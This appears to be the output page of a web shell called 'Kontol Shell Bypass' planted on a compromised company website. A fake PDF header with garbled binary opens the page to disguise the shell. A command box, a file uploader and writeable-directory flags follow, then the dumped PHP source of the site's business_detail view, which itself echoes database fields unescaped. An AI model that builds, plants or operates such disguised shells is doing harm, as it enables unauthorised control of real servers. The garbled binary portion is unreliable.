%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardacorporation.net/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardacorporation.net/application/views/business_detail.php
<section class="innerpage-slider">
	<div class="innerpage-sliderin2">
		<div class="container">
         <div class="row">
         <div class="col-md-12">
                	 <div class="heading">
                        <a href="<?= base_url('') ?>business?tab=all"><i class="fa fa-arrow-left" aria-hidden="true"></i></a> 
                        <h1><?=$business_detail['name'].', '.$business_detail['city'] ?> </h1> 
                     
                     	<a class="visit-website" target="_blank" href="<?=$business_detail['site_url']?>">Visit Website</a>
                     </div>
                </div>
         </div>       
         </div>
	</div>          
</section>
<section class="business-detail">
	<div class="container-fluid">
    <div class="row">
    	<div class="col-md-1"> </div>
    	<div class="col-md-4">
    		 
            	 
		 </div>
         
         <div class="col-md-7">
         	<div class="sharda-heading">
           <h3> <?=$business_detail['name']?></h3>

			
            </div>
            
         </div>
   		</div>
	<div class="row">
    	<div class="col-md-1"> </div>
    	<div class="col-md-4">
    		<div class="business-1">
            <?=$business_detail['overview']?>
            	<!-- <h4>A Truly Global University</h4>
            	<p>Sharda University is a leading Educational institution based out of Greater Noida, Delhi NCR. A venture of the renowned Sharda Group of Institutions (SGI), The University has established itself as a high quality education provider with prime focus on holistic learning and imbibing competitive abilities in students.
</p>			 -->
<a href="#about-texts" class="button2"><span>Discover More </span><i class="fa fa-arrow-down" aria-hidden="true"></i></a>
            
            </div>
            	 
		 </div>
         
         <div class="col-md-7">
         <div class="video-sec">
         <div class="leaf-2 wow bounceInRight" data-wow-offset="300"> <img src="<?= base_url('assets/imgs/leaf5.png') ?>" alt="Sharda Corporation" width="320" height="390" /></div>
         	<!-- <iframe width="100%" height="450" src="https://www.youtube.com/embed/bKqIg6V4kcg" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe> -->
                <?php if(!empty($business_detail['youtube_url'])){
                $video_id = explode("?v=",$business_detail['youtube_url']);
                        $video_id = $video_id[1];
                
                    ?>
                <iframe width="100%" height="450" src="https://www.youtube.com/embed/<?=$video_id?>" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
                <?php } else if(!empty($business_detail['business_image'])){?>
                    <div class="div-frame">
         	        <img src="<?= base_url('attachments/business_images/'.$business_detail['business_image']); ?>"  alt="<?=$business_detail['name']?>" width="320" height="390"  />
                    </div>
                <?php }?>
            </div>
         </div>
   		</div>
	</div>
	
 	<div class="container about-texts" id="about-texts">
	<div class="row">
    	<div class="col-md-12">
    			 <h2><?=$business_detail['title']?></h2>


		</div>
        <div class="col-md-3">
        	<div class="logo-sides">
    	      <!-- <img src="https://www.sharda.ac.in/attachments/site_logo/logo11.png" /> -->
    	      <img src="<?=base_url('attachments/business_images/'.$business_detail['site_logo'])?>"  alt="<?=$business_detail['name']?>" width="225" height="74"  />

            </div>  
		</div>
        <div class="col-md-9">
        <?=html_entity_decode($business_detail['description'])?>
       
		</div>
        
   		</div>
	</div>
    <div class="container vissons">
	<div class="row">
    	 
        <div class="col-md-12">
    	      <div class="why-work-list">
                    	<h5>Key Factors</h5>
                        <?=$business_detail['mission_vision']?>
                    
                    	
                    </div>
		</div>
        
	</div>
    
 	<div class="row">
    	 
         
        <div class="col-md-12">
    	      <div class="contact-info">
                        <?=$business_detail['contact']?>
						<small>Or visit our website for</small>
 						<a href="<?=$business_detail['site_url']?>" class="button2"><span>More Contact Details </span><i class="fa fa-arrow-right" aria-hidden="true"></i></a>
                    </div>
		</div>
        
   		</div>
        </div>
     
</section>
<?php if(count($teamArray)>0){ ?>
<!-- chairman section -->
<section class="chairman-speak chairman-business">
	<div class="chaiman-blank"></div>
    <div class="container-fluid">
     	<div class="chairman-slider">
         <?php foreach($teamArray as $team){?>
        	<div class="chairman-slider-in">
        <div class="row">
                 <div class="col-md-5">
                	<div class="image">
                		<img src="<?= base_url('attachments/team_images/'.$team['profile_image']) ?>" width="561" height="418" alt="<?=$team['name']?> (<?=$team['designation']?>)" />
                    </div>
                </div>
                <div class="col-md-5">
                	<div class="content">
                    	<h4><?=$team['name']?> <strong><?=$team['designation']?></strong></h4>
                    	<p><?=substr(html_entity_decode($team['description']),0,400).'...'?> </p>
                        <!-- <a href="#" class="button1"><span>Read More </span><i class="fa fa-arrow-right" aria-hidden="true"></i> -->
</a>
                    </div>
                
                </div>
       </div>
        </div>
         <?php }?>
        <!-- <div class="chairman-slider-in">
        <div class="row">
                 <div class="col-md-5">
                	<div class="image">
                		<img src="<?= base_url('assets/imgs/chairman-2.png') ?>" alt="Sharda Chairman">
                    </div>
                </div>
                <div class="col-md-5">
                	<div class="content">
                    	<h4>Mr. Yatendra Kumar Gupta <strong>Vice Chairman</strong></h4>
                    	<p>When you come to Sharda, you are choosing a university that has been raising the bar of excellence in education since 2009. Behind this success was the experience of almost a decade in managing a large conglomerate of education institutions with infrastructure and education delivery processes benchmarked with the best.   </p>
                        <a href="#" class="button1"><span>Read More </span><i class="fa fa-arrow-right" aria-hidden="true"></i>
</a>
                    </div>
                
                </div>
       </div>
       </div> -->
       </div>
       </div>     
 </section>
<!-- end chairman section -->
         <?php }?>

<!-- business-impect -->
<?php if(count($impactArray)>0){ ?>
<section class="business-impect">
	<div class="container">
		<div class="row">
    	 
         
        <div class="col-md-12">
    	       
<div class="accordion md-accordion" id="accordionEx" role="tablist" aria-multiselectable="true">
<h4><?=$business_detail['impact_name']?></h4>

<?php  $k=0; foreach($impactArray as $impact) { ?>
	<div class="card">
     <div class="card-header" role="tab" id="heading<?=$k?>">
      <a class="collapsed <?php if($k>0) { ?>collapsed<?php } ?>" data-toggle="collapse" data-parent="#accordionEx" href="#collapse<?=$k?>" aria-expanded="false" aria-controls="collapse<?=$k?>">
      <?=$impact['impact_title']?> <div class="icon"></div>
       </a>
    </div>
     <div id="collapse<?=$k?>" class="collapse <?php if($k==0) { ?>in<?php } ?>" role="tabpanel" aria-labelledby="heading<?=$k?>" data-parent="#accordionEx" aria-expanded="false" style="height: 0px;">
      <div class="card-body">
      <?=html_entity_decode($impact['impact_description'])?> 
      </div>
    </div>
  </div>
  <?php $k++; } ?>

    <!-- <div class="card">
     <div class="card-header" role="tab" id="headingTwo2">
      <a class="collapsed" data-toggle="collapse" data-parent="#accordionEx" href="#collapseTwo2" aria-expanded="false" aria-controls="collapseTwo2">
           240+ Collaborations   <div class="icon"></div>
       </a>
    </div>
     <div id="collapseTwo2" class="collapse" role="tabpanel" aria-labelledby="headingTwo2" data-parent="#accordionEx" aria-expanded="false" style="height: 0px;">
      <div class="card-body">
          Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
      </div>
    </div>

  </div>
  	<div class="card">
     <div class="card-header" role="tab" id="headingTwo2">
      <a class="collapsed" data-toggle="collapse" data-parent="#accordionEx" href="#collapseTwo3" aria-expanded="false" aria-controls="collapseTwo2">
          13,000+ Students on Campus <div class="icon"></div>
       </a>
    </div>
     <div id="collapseTwo3" class="collapse" role="tabpanel" aria-labelledby="headingTwo2" data-parent="#accordionEx" aria-expanded="false" style="height: 0px;">
      <div class="card-body">
          Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
      </div>
    </div>

  </div>
 	<div class="card">
     <div class="card-header" role="tab" id="headingTwo2">
      <a class="collapsed" data-toggle="collapse" data-parent="#accordionEx" href="#collapseTwo4" aria-expanded="false" aria-controls="collapseTwo2">
           1200+ Faculty <div class="icon"></div>
       </a>
    </div>
     <div id="collapseTwo4" class="collapse" role="tabpanel" aria-labelledby="headingTwo2" data-parent="#accordionEx" aria-expanded="false" style="height: 0px;">
      <div class="card-body">
          Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
      </div>
    </div>

  </div>
  	<div class="card">
     <div class="card-header" role="tab" id="headingTwo2">
      <a class="collapsed" data-toggle="collapse" data-parent="#accordionEx" href="#collapseTwo5" aria-expanded="false" aria-controls="collapseTwo2">
           63 Acre Campus <div class="icon"></div>

 
       </a>
    </div>
     <div id="collapseTwo5" class="collapse" role="tabpanel" aria-labelledby="headingTwo2" data-parent="#accordionEx" aria-expanded="false" style="height: 0px;">
      <div class="card-body">
          Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
      </div>
    </div>

  </div>
  	<div class="card">
     <div class="card-header" role="tab" id="headingTwo2">
      <a class="collapsed" data-toggle="collapse" data-parent="#accordionEx" href="#collapseTwo6" aria-expanded="false" aria-controls="collapseTwo2">
           85+ Nationalities <div class="icon"></div>
       </a>
    </div>
     <div id="collapseTwo6" class="collapse" role="tabpanel" aria-labelledby="headingTwo2" data-parent="#accordionEx" aria-expanded="false" style="height: 0px;">
      <div class="card-body">
          Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
      </div>
    </div>

  </div> -->
   
</div>
		</div>
        
		</div>
	</div>     
 </section>
<?php }?>
<!-- end business-impect-->


<!-- approvals -->
<!-- <section class="approvals">

<div class="leaf-3"><img src="http://13.126.253.70/shardagroup/assets/imgs/leaf.png" alt="Sharda Chairman"></div>
<section class="our-team">
     	<div class="container">
        	<div class="row">
                 <div class="col-md-12">
                	<div class="content">
                    	<small></small>
                        <div class="span">Accrediations</div>
                        <h4>Approvals & Recognitions</h4>
                     </div>
                </div>
                </div>
       </div>         
</section>
	<div class="container">
		<div class="row">
    	 
         
        <div class="col-md-12">
    	       
 <div class="approvals-list">
    <ul> -->
    <?php //foreach($approvalsArray as $approvals){ ?>
        <!-- <li>
            <div class="image"><img src="<?=base_url('attachments/approval_images/'.$approvals['approval_image'])?>" /></div>
            <div class="content"><?=$approvals['title']?></div>
        </li> -->
    <?php //}?>
        <!-- <li>
            <div class="image"><img src="http://13.126.253.70/shardagroup/assets/imgs/s2.png" /></div>
            <div class="content">University Grants Commission (UGC)</div>
        </li>
        <li>
            <div class="image"><img src="http://13.126.253.70/shardagroup/assets/imgs/s3.png" /></div>
            <div class="content">Member of Association of India Universities (AIU)</div>
        </li> -->
    <!-- </ul>
</div>
		</div>
        
		</div>
	</div>     
 </section> -->
<!-- end approvals-->

Kontol Shell Bypass